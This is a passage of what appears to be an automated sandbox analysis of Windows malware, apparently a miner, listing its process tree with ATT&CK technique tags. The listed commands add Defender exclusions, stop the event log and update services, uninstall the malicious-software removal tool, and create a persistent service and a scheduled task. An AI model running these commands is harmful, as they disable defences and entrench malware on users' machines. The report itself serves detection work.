        C:\Windows\system32\sc.exe delete "BTTHHWER"
        7⤵
        Launches sc.exe
        
        PID:5024
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "BTTHHWER" binpath= "C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:2964
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:3028
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "BTTHHWER"
        7⤵
        Launches sc.exe
        
        PID:1660
      - C:\Windows\RuntimeBroker.exe
        
        "C:\Windows\RuntimeBroker.exe" /verysilent
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "RuntimeBroker" /tr "C:\ProgramData\RuntimeBroker.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3124
      - C:\Windows\RuntimeBroker.exe
        
        "C:\Windows\RuntimeBroker.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3552

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3992

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4116

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4224

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2168

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1072

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2108

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe c3b1f6ecf4be5027c599eca17d604dbe 0sxHLKYJKkCzgDh1du/pzg.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:3912
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:4912

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:4568

C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe
C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4320
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4448
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1376
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4368
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3200
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3444
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3656
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4040
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3844
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4452
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4728
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3572

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3668

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery